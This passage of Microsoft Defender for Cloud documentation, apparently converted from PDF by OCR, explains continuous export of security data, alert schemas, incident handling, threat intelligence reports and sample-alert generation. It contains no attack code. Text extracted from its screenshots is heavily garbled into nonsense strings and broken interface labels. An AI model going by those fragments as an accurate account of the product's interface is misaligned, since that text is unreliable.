(powered by Update Center)“ and System updates should be installed on your 
machines? each has one 'sub' recommendation per outstanding system 
update. 

o The recommendation Machines should have vulnerability findings resolved £ 
has a 'sub' recommendation for every vulnerability identified by the vulnerability 
scanner. 


O Note 


If you're configuring a continuous export with the REST API, always include 
the parent with the findings. 


e Secure score per subscription or per control. 
e Regulatory compliance data. 


Set up a continuous export 


You can configure continuous export from the Microsoft Defender for Cloud pages in 
Azure portal, via the REST API, or at scale using the supplied Azure Policy templates. 


Use the Azure portal 


Configure continuous export from the Defender for 
Cloud pages in Azure portal 


If you're setting up a continuous export to Log Analytics or Azure Event Hubs: 
1. From Defender for Cloud's menu, open Environment settings. 


2. Select the specific subscription for which you want to configure the data 
export. 


3. From the sidebar of the settings page for that subscription, select Continuous 


export. 


Settings | Continuous export 


Contoso Hotels Tenant - Production 


[e Search (Ctrl+/) 


Settings 

F Defender plans 

~ Auto provisioning 

@ Email notifications 
GO Integrations 

ZA Workflow automation 
Policy settings 

©: Security policy 


© Governance rules (preview) 


[a=] 


A You have limited permissions to the export target subscription, this may affect the accuracy of the data showing below. 


= Continuous export 


Configure streaming export setting of Defender for Cloud data to multiple export targets. 
Exporting Defender for Cloud's data also enables you to use experiences such as integration with 3rd-party SIEM and Azure Data Explorer. 


Learn More > 


Event hub Log Analytics workspace 


Export enabled K on J ) 


Exported data types 
E Security recommendations 
Recommendation severity * 
Include security findings © 
@ Secure score @ 
Controls 


E Security alerts 


@ Regulatory compliance 


Export frequency 


E streaming updates © 


@ Snapshots (Preview) © 


ECunart erti ean rrien 


The resource group where this export configuration will reside 


Resource group * © 


Export target 
Subscription * 

Event Hub namespace * 
Event Hub name * 


Event hub policy name * 


All recommendations selected Vv 


Low,Medium,High VY 


Overall score,Control score s 
All controls selected M 
Low,Medium,High,Informational Vv 
All standards selected KA 


Select resource group W 


Contoso Hotels Tenant - Production V 


Select Event Hub namespace V 


Select Event Hub W | QA 


Select Event Hub policy name V 


Here you see the export options. There's a tab for each available export target, 
either event hub or Log Analytics workspace. 


4. Select the data type you'd like to export and choose from the filters on each 
type (for example, export only high severity alerts). 


5. Select the export frequency: 


e Streaming — assessments are sent when a resource’s health state is 
updated (if no updates occur, no data is sent). 

e Snapshots — a snapshot of the current state of the selected data types 
that are sent once a week per subscription. To identify snapshot data, 
look for the field IsSnapshot . 


If your selection includes one of these recommendations, you can include the 
vulnerability assessment findings together with them: 


e SQL databases should have vulnerability findings resolved Z 

e SQL servers on machines should have vulnerability findings resolved Z 

e Container registry images should have vulnerability findings resolved 
(powered by Qualys) £ 

e Machines should have vulnerability findings resolved £ 

e System updates should be installed on your machines E 


To include the findings with these recommendations, enable the include 
security findings option. 


Settings | Continuous export 


Contoso 


P Search (Ctrl+/) | « 


Settings 


©) Pricing tier E Continuous export 


© Data Collection 
Configure streaming export setting of Security alerts and recommendations to multiple export targets, 

@ Email notifications Exporting Microsoft Defender for Cloud's data also enables you to use experiences such as integration with 3rd-party SIEM and Azure Data Explorer. 
Learn More > 

© Threat detection 


ZA Workflow automation Event hub Log Analytics workspace 


E Continuous export ————— 
Export enabled On off J 


Exported data types 


E security recommendations All recommendations sele.. V 


Recommendation severity No selected severities M 


Include security findings ( | Dv 


6. From the "Export target" area, choose where you'd like the data saved. Data 
can be saved in a target of a different subscription (for example, on a Central 
Event Hubs instance or a central Log Analytics workspace). 


You can also send the data to an Event hubs or Log Analytics workspace ina 
different tenant. 


7. Select Save. 


O Note 


Log analytics supports records that are only up to 32KB in size. When the data 
limit is reached, you will see an alert telling you that the Data limit has been 


exceeded. 


Exporting to a Log Analytics workspace 


If you want to analyze Microsoft Defender for Cloud data inside a Log Analytics 
workspace or use Azure alerts together with Defender for Cloud alerts, set up 
continuous export to your Log Analytics workspace. 


Log Analytics tables and schemas 


Security alerts and recommendations are stored in the SecurityAlert and 
SecurityRecommendation tables respectively. 


The name of the Log Analytics solution containing these tables depends on whether 
you've enabled the enhanced security features: Security (‘Security and Audit’) or 


SecurityCenterFree. 


Q Tip 


To see the data on the destination workspace, you must enable one of these 


solutions Security and Audit or SecurityCenterFree. 


Active 

v É) Ins 
>» ChangeTracking 
> Containerlnsights 


> Containers 


v 


LogManagement 
v Security 
> H CommonSecurityLog 
> E LinuxAuditLog 
> H ProtectionStatus 
> E SecurityAlert 
> H SecurityBaseline b 


To view the event schemas of the exported data types, visit the Log Analytics table 


schemas Z . 


Export data to an Azure Event Hubs or Log 
Analytics workspace in another tenant 


You cannot configure data to be exported to a log analytics workspace in another 
tenant when using Azure Policy to assign the configuration. This process only works with 
the REST API, and the configuration is unsupported in the Azure portal (due to requiring 


multitenant context). Azure Lighthouse does not resolve this issue with Policy, although 
you can use Lighthouse as the authentication method. 


When collecting data into a tenant, you can analyze the data from one central location. 
To export data to an Azure Event Hubs or Log Analytics workspace in a different tenant: 


1. In the tenant that has the Azure Event Hubs or Log Analytics workspace, invite a 
user from the tenant that hosts the continuous export configuration, or 
alternatively configure Azure Lighthouse for the source and destination tenant. 

2. If using Azure AD B2B Guest access, ensure that the user accepts the invitation to 
access the tenant as a guest. 

3. If you're using a Log Analytics Workspace, assign the user in the workspace tenant 
one of these roles: Owner, Contributor, Log Analytics Contributor, Sentinel 
Contributor, or Monitoring Contributor. 

4. Create and submit the request to the Azure REST API to configure the required 
resources. You'll need to manage the bearer tokens in both the context of the local 
(workspace) and the remote (continuous export) tenant. 


Continuously export to an event hub behind a 
firewall 


You can enable continuous export as a trusted service, so that you can send data to an 
event hub that has an Azure Firewall enabled. 


To grant access to continuous export as a trusted service: 
1. Sign in to the Azure portal £. 
2. Navigate to Microsoft Defender for Cloud > Environmental settings. 
3. Select the relevant resource. 
4. Select Continuous export. 


5. Select Export as a trusted service. 


Home > Settings 


Settings | Continuous export 


N/A 


| Ø Search 


Settings 


Defender plans Export frequency 
@ Email notifications 
Ta Workflow automation E pazia reg 
GO Integrations Snapshots (Preview) © 
Continuous export 
Policy settings € 

Export configuration 

*: Security policy 


© Governance rules (preview) Resource group * © Select resource group Y 


Export target 


Subscription * MDC-EEE-Playground 
Event Hub namespace * Select Event Hub namespace W 
Event Hub name * Select Event Hub V 


Event hub policy name 


@ Saving data to event hub incurs ingestion charges, as detailed here> 


O No Event Hubs namespaces found. To create one click here> 


You need to add the relevant role assignment on the destination Event Hubs. 
To add the relevant role assignment on the destination Event Hub: 
1. Navigate to the selected Event Hubs. 


2. Select Access Control > Add role assignment 


Home > Event Hubs > contososiempipe-ns 


Event Hubs < Ro contososiempipe-ns | Access control (IAM) 


Microsoft (microsoft.onmicrosoft.com) Event Hubs Namespace 


+ Create GO Manage view v Er Ø Search 

| © Overview 

contoso 

Name t E Activity log 

— e 3 BQ Access control (IAM) 

=, contososiempipe-ns TZA 
o Tags 
ES Diagnose and solve problems 
g Events 
Settings 


E Shared access policies 
Ž Scale 

E Geo-Recovery 

TZ Networking 

& Encryption 

Gm Configuration 


ili Properties 


3. Select Azure Event Hubs Data Sender. 
4. Select the Members tab. 


5. Select + Select members. 


> 


+ Add Download role assignments 


O Refresh 


Check access Role assignments Roles Deny assignments Classic 


My access 


View my level of access to this resource. 


View my access 


Check access 


Review the level of access a user, group, service principal, or managed identity has t 


Grant access to this resource 


Grant access to resources by assigning a role. 


6. Search for and select Windows Azure Security Resource Provider. 


Home > Event Hubs > contososiempipe-ns | Access control (IAM) 


Add role assignment 
OY Got feedback? 


Poe Stern 


Selected role Azure Event Hubs Data Sender 


Assign access to 


User, group, or service principal 


Managed identity 


Members 
Name Object ID Type 
No members selected 

Description Optional 


Select members 


Select © 


Learn more ri 


View access 


View the role a: 
other resources 


= 


windows azure security resource provider 


| | Previous Next 


7. Select Review + assign. 


Selected members: 


No members selected. Search for and add one or more members 


you want to assign to the role for this resource. 


Learn more about RBAC 


Select Close 


View exported alerts and recommendations in 


Azure Monitor 


You might also choose to view exported Security Alerts and/or recommendations in 
Azure Monitor. 


Azure Monitor provides a unified alerting experience for various Azure alerts including 
Diagnostic Log, Metric alerts, and custom alerts based on Log Analytics workspace 
queries. 


To view alerts and recommendations from Defender for Cloud in Azure Monitor, 
configure an Alert rule based on Log Analytics queries (Log Alert): 


1. From Azure Monitor's Alerts page, select New alert rule. 


Monitor - Alerts 


Microsoft 


O Search (Cmd+/) be + Newalert rule ZG Manage alert rules Ra Manage actions ÑQ View classic alerts ©) Refresh 
Oveen i Don't see a subscription? Open Directory + Subscription settings 
g | Subscription * © Resource group © 
E Activity log | [100 selected \ | T Type to start filtering ... v 
EJ Alerts | 
AÍ Metrics | Total alerts Smart groups (Preview) © Total alert rules Action rules (preview) © 
® Logs | 639 62 329 2 
. | Since 11/25/2019, 6:16:28 PM 90.30% Reduction Enabled 246 Enabled 2 
© Service Health | 
B Workbooks 
Insights Severity Total Alerts 
GE | Sev 0 68 
E Applications | Isev d 
E Virtual Machines (preview) b Isev 2 
= . | Sev 2 54 
== Storage Accounts (preview) l id EE 
Gete Isev 3 145 
| Sev 4 20 m 


E Networks (preview) 
& Cosmos DB (preview) 


©) Key vaults (preview) 


2. In the create rule page, configure your new rule (in the same way you'd configure a 
log alert rule in Azure Monitor): 


e For Resource, select the Log Analytics workspace to which you exported 
security alerts and recommendations. 


e For Condition, select Custom log search. In the page that appears, configure 
the query, lookback period, and frequency period. In the search query, you 
can type SecurityAlert or SecurityRecommendation to query the data types 
that Defender for Cloud continuously exports to as you enable the 
Continuous export to Log Analytics feature. 


e Optionally, configure the Action Group that you'd like to trigger. Action 
groups can trigger email sending, ITSM tickets, WebHooks, and more. 


Create rule 
Rules managemen! 


| F * RESOURCE HIERARCHY 


OO contosoretail-IT ? Contoso IT -demo > [=] contosoazur 
Select 
* CONDITION Monthly cost in USD (Estimated) 
b Qo Whenever the Custom log search is Greater than 0 count $ 1.50 E 
Total $ 1.50 


@ Azure Alerts are currently limited to either 2 metric, 1 log, or 1 activity log signal per alert rule. To alert on more signals, please create additional alert rules. 


a ACTIONS 
Action group name Contain actions 
Send Email 2 Email(s) i 
Select action group Create action group 


O Action rules (preview) allows you to define actions at scale as well as suppress actions. Learn more about this functionality here 
Customize Actions 
| Email subject 
pe 
Include custom Json payload for webhook 


ALERT DETAILS 


Alert rule name * 


MicrosoftDefenderforCloudAlertRule 


Description 


Alert rule for exported data from Microsoft Defender for Cloud | 


Severity * © 


Warning(Sev 1) wv 


Enable rule upon creation 


Yes No 


Suppress Alerts 


Create alert rule 


The Microsoft Defender for Cloud alerts or recommendations appears (depending on 
your configured continuous export rules and the condition you defined in your Azure 


Monitor alert rule) in Azure Monitor alerts, with automatic triggering of an action group 
(if provided). 


Manual one-time export of alerts and 
recommendations 


To download a CSV report for alerts or recommendations, open the Security alerts or 
Recommendations page and select the Download CSV report button. 


Q Tip 


Due to Azure Resource Graph limitations, the reports are limited to a file size of 13K 
rows. If you're seeing errors related to too much data being exported, try limiting 
the output by selecting a smaller set of subscriptions to be exported. 


@ Microsoft Defender for Cloud | Security alerts 


Showing subscription ‘ASC DEMO" 


*& Suppression rules 8 Security alerts map O Sample alerts 


» ©) Refresh $ Change status ~ TE Open query 
Active alerts Affected resources 
| Æ Search by ID, title, or affected resource Subscription == All 


E Severity d Alert title Ty 


High Ọ Microsoft Defender for Cloud test... 


High @ Exposed Kubernetes dashboard d... 


High DU Exposed Kubernetes dashboard d... 


High @ Unusual amou... Sample alert 


| High @ Access froma... Sample alert 


High @ Exposed Kubernetes dashboard d... 


© Note 


Affected resource Ty 

48 ASC-AKS-CLOUD-TALK 
ZO ASC-AKS-CLOUD-TALK 
$% ASC-IGNITE-DEMO 

= Sample-Storage 

= Sample-Storage 


$% ASC-IGNITE-DEMO 


Status == Active X 


Activity start time (UTC+2) Ty MITRE ATT&CK® tactics 


02/01/21, 05:04 PM 


01/28/21, 04:51 PM 


01/26/21, 11:04 AM 


01/25/21, 11:13 AM 


01/25/21, 11:13 AM 


01/11/21, 03:47 PM 


Severity == All X 


bo Add filter 


C) Persistence 
ZE initial Access 
E initial Access 
Tb Pre-attack 
y Exfiltration 


EZ initial Access 


L Download CSV report 


No grouping V 


Status Ty 


Active 


Active 


Active 


Active 


Active 


Active 


These reports contain alerts and recommendations for resources from the currently 


selected subscriptions. 


Next steps 


In this article, you learned how to configure continuous exports of your 


recommendations and alerts. You also learned how to download your alerts data as a 


CSV file. 


For related material, see the following documentation: 


e Learn more about workflow automation templates Z. 


e Azure Event Hubs documentation 


e Microsoft Sentinel documentation 


e Azure Monitor documentation 


e Export data types schemas E 


e Check out common questions about continuous export. 


Security alerts schemas 
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If your subscription has Defender for Cloud Defender plans enabled, you'll receive 
security alerts when Defender for Cloud detects threats to their resources. 


You can view these security alerts in Microsoft Defender for Cloud's pages - overview 
dashboard, alerts, resource health pages, or workload protections dashboard - and 


through external tools such as: 


e Microsoft Sentinel - Microsoft's cloud-native SIEM. The Sentinel Connector gets 
alerts from Microsoft Defender for Cloud and sends them to the Log Analytics 
workspace for Microsoft Sentinel. 

e Third-party SIEMs - Send data to Azure Event Hubs. Then integrate your Event Hub 
data with a third-party SIEM. Learn more in Stream alerts to a SIEM, SOAR, or IT 


Service Management solution. 
e The REST API - If you're using the REST API to access alerts, see the online Alerts 


API documentation. 


If you're using any programmatic methods to consume the alerts, you'll need the correct 
schema to find the fields that are relevant to you. Also, if you're exporting to an Event 
Hub or trying to trigger Workflow Automation with generic HTTP connectors, use the 
schemas to properly parse the JSON objects. 


@ Important 


The schema is slightly different for each of these scenarios, so make sure you select 


the relevant tab below. 


The schemas 


Microsoft Sentinel 


The Sentinel Connector gets alerts from Microsoft Defender for Cloud and sends 
them to the Log Analytics Workspace for Microsoft Sentinel. 


To create a Microsoft Sentinel case or incident using Defender for Cloud alerts, 
you'll need the schema for those alerts shown below. 


Learn more in the Microsoft Sentinel documentation. 


The data model of the schema 


Field 

AlertName 
AlertType 
ConfidenceLevel 
ConfidenceScore 
Description 
DisplayName 


EndTime 


Entities 


ExtendedLinks 


ExtendedProperties 


IsIncident 


ProcessingEndTime 


ProductComponentName 


ProductName 
ProviderName 
RemediationSteps 
Resourceld 
Severity 


SourceComputerld 


SourceSystem 


Description 

Alert display name 

unique alert identifier 

(Optional) The confidence level of this alert (High/Low) 
(Optional) Numeric confidence indicator of the security alert 
Description text for the alert 

The alert's display name 


The impact end time of the alert (the time of the last event 
contributing to the alert) 


A list of entities related to the alert. This list can hold a mixture 
of entities of diverse types 


(Optional) A bag for all links related to the alert. This bag can 
hold a mixture of links for diverse types 


A bag of additional fields which are relevant to the alert 


Determines if the alert is an incident or a regular alert. An 
incident is a security alert that aggregates multiple alerts into 
one security incident 


UTC timestamp in which the alert was created 


(Optional) The name of a component inside the product which 
generated the alert. 


constant (‘Azure Security Center’) 

unused 

Manual action items to take to remediate the security threat 
Full identifier of the affected resource 

The alert severity (High/Medium/Low/Informational) 


a unique GUID for the affected server (if the alert is generated 
on the server) 


unused 


Field Description 


StartTime The impact start time of the alert (the time of the first event 
contributing to the alert) 


SystemAlertld Unique identifier of this security alert instance 


Tenantld the identifier of the parent Azure Active directory tenant of the 
subscription under which the scanned resource resides 


TimeGenerated UTC timestamp on which the assessment took place (Security 
Center's scan time) (identical to DiscoveredTimeUTC) 


Type constant (‘SecurityAlert’) 

VendorName The name of the vendor that provided the alert (e.g. 
‘Microsoft’) 

VendorOriginalld unused 


WorkspaceResourceGroup in case the alert is generated on a VM, Server, Virtual Machine 
Scale Set or App Service instance that reports to a workspace, 
contains that workspace resource group name 


WorkspaceSubscriptionId in case the alert is generated on a VM, Server, Virtual Machine 
Scale Set or App Service instance that reports to a workspace, 
contains that workspace subscriptionld 


Next steps 


This article described the schemas that Microsoft Defender for Cloud's threat protection 


tools use when sending security alert information. 


For more information on the ways to access security alerts from outside Defender for 
Cloud, see: 


e Microsoft Sentinel - Microsoft's cloud-native SIEM 

e Azure Event Hubs - Microsoft's fully managed, real-time data ingestion service 

e Continuously export Defender for Cloud data 

e Log Analytics workspaces - Azure Monitor stores log data in a Log Analytics 
workspace, a container that includes data and configuration information 


Manage security incidents in Microsoft 
Defender for Cloud 
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Triaging and investigating security alerts can be time consuming for even the most 
skilled security analysts. For many, it's hard to know where to begin. 


Defender for Cloud uses analytics to connect the information between distinct security 
alerts. Using these connections, Defender for Cloud can provide a single view of an 
attack campaign and its related alerts to help you understand the attacker's actions and 


the affected resources. 


This page provides an overview of incidents in Defender for Cloud. 


What is a security incident? 


In Defender for Cloud, a security incident is an aggregation of all alerts for a resource 
that align with kill chain patterns. Incidents appear in the Security alerts page. Select an 
incident to view the related alerts and get more information. 


Managing security incidents 


1. On Defender for Cloud's security alerts page, use the Add filter button to filter by 
alert name to the alert name Security incident detected on multiple resources. 


Security alerts x 


Q Refresh EA Change status v KO Open query @ Suppression rules E Security alerts map (Preview) © create sample alerts 

GO Active alerts by severity 

Active alerts Affected resources High (166) [Medium (414) [Low (64) 
S Subscription == All Status == Active X Severity == Low, Medium, Hon (Y| tease | 

Add filter D 

O | sich @ Suspicious process executeft tool ex... Ml cH EEE | = = | 5 
im | High @ suspicious process executeft tool ex.. E cH Value | 0 selected A | € 
E High @ Suspicious process executeft tool ex... E cH [Cron ë EEE 5 
im High @ Suspicious process executeft tool ex... Kc $ 
g High 9 Suspicious process executeft tool ex... EZ CH1-VictimvMoo 11/20/20, 6:00 AM z Credential Access Active 

(J f High Ọ suspicious process executeft tool ex... E CH1-VictimvM00-Dev 11/20/20, 6:00 AM E, Credential Access Active 

o | High O Suspicious process executed EZ dockervm-redhat 11/20/20, 5:00 AM S Credential Access Active 

I | High © Microsoft Defender for Cloud test ac... #8 ASC-AKS-CLOUD-TALK 11/20/20, 3:00 AM GZ Persistence Active 

g | High O Exposed Kubernetes dashboard det... #8 ASC-WORKLOAD-PRO... 11/20/20, 12:00 AM EO Initial Access Active 

O | High @ suspicious process executed (seen... Ml CH-VictimvM00-Dev 11/19/20, 7:00 PM |] credential Access Active 


< Previous Page | 1 ba | of 17 | Next > | 


The list is now filtered to show only incidents. Notice that security incidents have a 
different icon to security alerts. 


« 


Search by ID, title, or ... | Subscription == All Status == Active X Severity == Low, Medium, High >< 


Alert name == Security incident detected on multiple resources >< ke Add filter 


| No grouping Vv 
g Severity d Alert title Ty Affected resource Ty Activity start time (... TA MITRE ATT... Status Ty 
g Medium ra Contoso Infrat 02/13/21, 08:00 AM Active 
g Medium Te Security incident detected on multiple resources mz Contoso Infra1 02/06/21, 07:00 AM Active 
o Medium Te Security incident detected on multiple resources rz Contoso Infra1 01/28/21, 01:00 AM Active 
g Medium Te Security incident detected on multiple resources mz Contoso Infra1 01/21/21, 12:35 AM Active 


2. To view details of an incident, select one from the list. A side pane appears with 
more details about the incident. 


JE Search by ID, t... Subscription == All Status == Active X Severity == Low, Medium, High >< Security incident detected on 


multiple resources 
Alert name == Security incident detected on multiple resources >< +, Add filter 


| | Medium 25 Active ba GOO 
dedika y Severity Status Activity tir 
Severity Ty Alerttitle Ty Affected resource 4 Activity start ti... Ty Status Ty GE 
Alert description 
E fi 2/1 GOO AM e 
Medium ye Security incident detected on m. #3 Contoso Infra1 02/13/21, 08:00 A! Active The incident which started on 2021-02-13 06:00:00 UTC 
2 E d recently detected on 2021-02-13 17:20:53 UTC 

' Security incident detected n Ño cont Infrat 02/06/21, 07:00 AM Acti Ga Ga 

Medium E Security incident detected on m EEE 106/21, ge indicates that similar attack methods were performed on 
Medium ee Security incident detected on m... rz Contoso Infra1 01/28/21, 01:00 AM Active yoti doud resources Edeploy, KEVA 
l Medium }* Security incident detected on m... # Contoso Infra1 01/21/21, 12:35 AM Active 


Affected resource 


? Contoso Infra1 
Subscription 
View full details | Take action 


3. To view more details, select View full details. 


Dashboard > Microsoft Defender for Cloud | Overview > Security alerts > 
Security incident d 


251810431 


} Security incident detected Alerts Take action 


High 2° Active ba © 06/11/20, 1... Severity 1 Description Ty Count Ty Activity start time Ty 
Severity Status Activity time 

l High 9 Potential SQL Brute Force attempt 8 Thu Jun 11 2020 12:54:30 
Alert description | High D Potential SQL injection 116 Thu Jun 11 2020 16:01:07 


The incident which started on 2020-06-11 09:54:30 UTC and recently 
detected on 2020-06-11 19:58:55 UTC indicates that an attacker has 
abused resource in your resource R-DEV\SQLEXPRESS 


Affected resource 


ki Env: Devel t 
Azure Arc machine resem 


? DS-ThreatDetection_Demo 
Subscription 


e- 


V Was this useful? O Yes O No x 


The left pane of the security incident page shows high-level information about the 
security incident: title, severity, status, activity time, description, and the affected 
resource. Next to the affected resource you can see the relevant Azure tags. Use 
these tags to infer the organizational context of the resource when investigating 
the alert. 


The right pane includes the Alerts tab with the security alerts that were correlated 
as part of this incident. 


@ Tip 


For more information about a specific alert, select it. 


Dashboard > Microsoft Defender for Cloud | Overview > Security alerts 


Security incident d 


251810431 

} Security incident detected Alerts. ‘Take action 

High 2S Active © 06/11/20, 1... da 

Severity Status E Activity time ^ E Mitigate the threat 


1. Escalate the alert to the information security team. 
Alert description 

2, Review the remediation steps of each one of the alerts 
The incident which started on 2020-06-11 09:54:30 UTC and recently 
detected on 2020-06-11 19:58:55 UTC indicates that an attacker has 


A You have 34 more alerts on the affected resource. View all >> 
abused resource in your resource R-DEV\SQLEXPRESS 


^ © Prevent future attacks 


Affected resource Your top 2 active security recommendations on E R-DEV 


E RDEV Env: Development l Medium © Windows Defender Exploit Guard should be enabled on your machines 
Azure Arc machine 

l High © Vulnerabilities on your SQL servers on machine should be remediated 

? DS-ThreatDetection_Demo 


Subscription 
Solving security recommendations can prevent future attacks by reducing attack surface. 


View all 2 recommendations >> 
v {a} Trigger automated response 


v @& Suppress similar alerts (preview) Q 


v Was this useful? O Yes O No x Next: Take Action >> 


To switch to the Take action tab, select the tab or the button on the bottom of the 
right pane. Use this tab to take further actions such as: 


e Mitigate the threat - provides manual remediation steps for this security 
incident 

e Prevent future attacks - provides security recommendations to help reduce 
the attack surface, increase security posture, and prevent future attacks 

e Trigger automated response - provides the option to trigger a Logic App as a 
response to this security incident 

e Suppress similar alerts - provides the option to suppress future alerts with 


similar characteristics if the alert isn't relevant for your organization 


© Note 
The same alert can exist as part of an incident, as well as to be visible as a 


standalone alert. 


4. To remediate the threats in the incident, follow the remediation steps provided 
with each alert. 


Next steps 


This page explained the security incident capabilities of Defender for Cloud. For related 
information, see the following pages: 


e Security alerts in Defender for Cloud 


e Manage and respond to security alerts 


Microsoft Defender for Cloud threat 
intelligence report 
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Microsoft Defender for Cloud's threat intelligence reports can help you learn more 
about a threat that triggered a security alert. 


What is a threat intelligence report? 


Defender for Cloud's threat protection works by monitoring security information from 
your Azure resources, the network, and connected partner solutions. It analyzes this 
information, often correlating information from multiple sources, to identify threats. For 
more information, see How Microsoft Defender for Cloud detects and responds to 


threats. 


When Defender for Cloud identifies a threat, it triggers a security alert, which contains 
detailed information regarding the event, including suggestions for remediation. To help 
incident response teams investigate and remediate threats, Defender for Cloud provides 
threat intelligence reports containing information about detected threats. The report 


includes information such as: 


e Attacker's identity or associations (if this information is available) 

e Attackers’ objectives 

e Current and historical attack campaigns (if this information is available) 

e Attackers’ tactics, tools, and procedures 

e Associated indicators of compromise (loC) such as URLs and file hashes 

e Victimology, which is the industry and geographic prevalence to assist you in 
determining if your Azure resources are at risk 


e Mitigation and remediation information 


© Note 
The amount of information in any particular report will vary; the level of detail is 


based on the malware’s activity and prevalence. 


Defender for Cloud has three types of threat reports, which can vary according to the 


attack. The reports available are: 


e Activity Group Report: provides deep dives into attackers, their objectives, and 
tactics. 

e Campaign Report: focuses on details of specific attack campaigns. 

e Threat Summary Report: covers all of the items in the previous two reports. 


This type of information is useful during the incident response process. Such as when 
there's an ongoing investigation to understand the source of the attack, the attacker's 
motivations, and what to do to mitigate this issue in the future. 


How to access the threat intelligence report? 


1. From Defender for Cloud's menu, open the Security alerts page. 
2. Select an alert. 


The alerts details page opens with more details about the alert. For example, the 
Ransomware indicators detected alert details page: 


Home 
Security alert a 
2518100015486 
Ọ Ransomware indicators detected Hua, Take action 
High 2° Active © 06/16/2... B € 
Severity Status Activity time Compromised Host Suspicious Command Line 
AMPRODWE c\users\invest~ 1\appdata\local\temp\rans.. 
See more 
Alert description 
Analysis of host data indicates suspicious activity traditionally User Name Suspicious Process ID 
associated with lock-screen and encryption ransomware. Lock screen AME\e7hKS paga 
ransomware displays a full-screen message preventing interactive use 
of the host and access to its files. Encryption ransomware prevents 
access by encrypting data files. In both cases a ransom message is 
typically displayed, requesting payment in order to restore file access. Account Session ID 


Enrichment_tas_threat_reports 
Ox75cbS2e 


Report: Shadow Copy Delete 


Affected resource 
Suspicious Process Detected by 


AME š Ton GO \ A A 
g Virtual machine c:\users\invest~ 1\appdata\local\temp\rans... D Microsoft 
Tests Prod 
Subscription 
Related entities 


Vv E Account (1) 


v Dreo 


bai EA Host (1) 


Intent 


e Execution 


3 


wv Sr Host logon session (1) 


Vv d Process (2) 


E 


Next: Take Action >> 


3. Select the link to the report, and a PDF will open in your default browser. 


Microsoft 


THREAT 
INTELLIGENCE 


Threat summary: 
Shadow Copy Delete 


MSTI-TS-Shadow-Copy-Delete 


You can optionally download the PDF report. 


Ọ Tip 


The amount of information available for each security alert will vary according 
to the type of alert. 


Next steps 


This page explained how to open threat intelligence reports when investigating security 
alerts. For related information, see the following pages: 


e Managing and responding to security alerts in Microsoft Defender for Cloud. Learn 
how to manage and respond to security alerts. 
e Handling security incidents in Microsoft Defender for Cloud 


Alert validation in Microsoft Defender 
for Cloud 
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This document helps you learn how to verify if your system is properly configured for 
Microsoft Defender for Cloud alerts. 


What are security alerts? 


Alerts are the notifications that Defender for Cloud generates when it detects threats on 
your resources. It prioritizes and lists the alerts along with the information needed to 
quickly investigate the problem. Defender for Cloud also provides recommendations for 
how you can remediate an attack. 


For more information, see Security alerts in Defender for Cloud and Managing and 
responding to security alerts. 


Prerequisites 


To receive all the alerts, your machines and the connected Log Analytics workspaces 
need to be in the same tenant. 


Generate sample security alerts 


If you're using the new preview alerts experience as described in Manage and respond 
to security alerts in Microsoft Defender for Cloud, you can create sample alerts from the 
security alerts page in the Azure portal. 


Use sample alerts to: 


e evaluate the value and capabilities of your Microsoft Defender plans. 
e validate any configurations you've made for your security alerts (such as SIEM 


integrations, workflow automation, and email notifications). 
To create sample alerts: 


1. As a user with the role Subscription Contributor, from the toolbar on the security 
alerts page, select Sample alerts. 


2. Select the subscription. 


3. Select the relevant Microsoft Defender plan/s for which you want to see alerts. 


4. Select Create sample alerts. 


Home > Contoso, Ltd. Defender for Cloud 


@ Contoso, Ltd. Defender for Cloud | Security alerts 


Showing 6 subscriptions 
v TEZ Openquery E Suppression rules &% Security alerts map I sample alerts 


98 x8 20 61 


© overview Subscriptions 


Open alerts Active alerts In progress alerts Affected resources 
SI 


Create sample alerts (Preview) x 


© Refresh © Change stat Try Defender for Cloud alerts by creating sample alerts from our different Defender for Cloud 


[2 search ]« 
se plans, Learn more >> 


> 


General 


e Getting started 


E Recommendations P Search by ID, IP, name, or affected re... Subscription == All +y Add filter 


Defender for Cloud plans 


O Security alerts j 
v 
@ inventory Severity A Alert name Ty, Affected resource Ty. Resource Group 
lied BN Medium @ suspicious WordPress theme invocatio... @ TestResource vsdrop E app services 
@ Workbooks 
Medium @ suspicious WordPress theme invocatio... @ TestResource vsdrop B Key Vaults 
& Community 
= € E containers 
PP Dipi aad le gea Medium @ suspicious WordPress theme invocatio... @ TestResource vsdrop 
E Azure sat Databases 

a Medium @ suspicious WordPress theme invocatio... @® TestResource vsdrop 
Cloud Security E storage Accounts 
© Security posture Low @ suspicious User Agent detected ZG TestResource vsdrop B Virtual Machines 
E Regulatory compliance Low @ suspicious User Agent detected ZG TestResource vsdrop BP ons 
Q Workload protections E E Resource Manager 

Low @ suspicious User Agent detected ZO TestResource vsdrop 
E Firewall Manager E sat servers on machines 
n Low Suspicious User Agent detected @ TestResource edo 
E DevOps Security (Preview) E susp Pa . E Azure cosmos DB Accounts 
Management 
II! Environment settings 
Create sample alerts 

E Security solutions Previous | page[1 belen [ Next 


A notification appears letting you know that the sample alerts are being created: 


© 


d 


mike@contoso.com 


MICROSOFT (MICROSOFT.ONMI... 


I Sample alerts creation in progress... 3:54 P 


Creating sample alerts for the subscription 

“ProdTest2" ("04cd6"). Selected bundles: "App Services", 
"Key Vaults", "Kubernetes Services", "Azure SQL 
Database", "Storage Accounts", "Virtual Machines} 

may take a few moments. 


After a few minutes, the alerts appear in the security alerts page. They also appear 
anywhere else that you've configured to receive your Microsoft Defender for Cloud 
security alerts (connected SIEMs, email notifications, and so on). 


| Æ Search by ID, title, or affected resource | Status == Active >) Severity == Low, Medium, High X Time == Last month >X ME Add filter 


Tl severity A Alert title ty 


O | High @ Detected Petya ransomware indicators | Sample alert 


Affected resource Ty Activity start time (UTC+2) Ty MITRE ATT&CK® tactics 


EA sample-vM 


12/15/20, 3:54 PM $% Execution 


g | High @ Detected suspicious file cleanup commands Sample alert E sample-vM 12/15/20, 3:54 PM TIK Defense Evasion 
im High @ Digital currency mining container detected Sample alert ZO Sample-Kubern... 12/15/20, 3:54 PM $ Execution 

g High @ Potential SQL Injection Sample alert @ Sample-DB 12/15/20, 3:54 PM 

g | High @ Phishing content hosted on Azure Webapps Sample alert ZO Sample-App 12/15/20, 3:54 PM 5A Collectio, 

im Medium HE Suspicious PHP execution detected Sample alert EZ sample-vM 12/15/20, 3:54 PM $ Executi; 

O Medium B User accessed high volume of Key Vaults Sample alert @ Sample-Kv 12/15/20, 3:54 PM 


Ọ Tip 


The alerts are for simulated resources. 


Simulate alerts on your Azure VMs (Windows) 


After the Microsoft Defender for Endpoint agent is installed on your machine, as part of 


Defender for Servers integration, follow these steps from the machine where you want 


to be the attacked resource of the alert: 


1. Open an elevated command-line prompt on the device and run the script: 


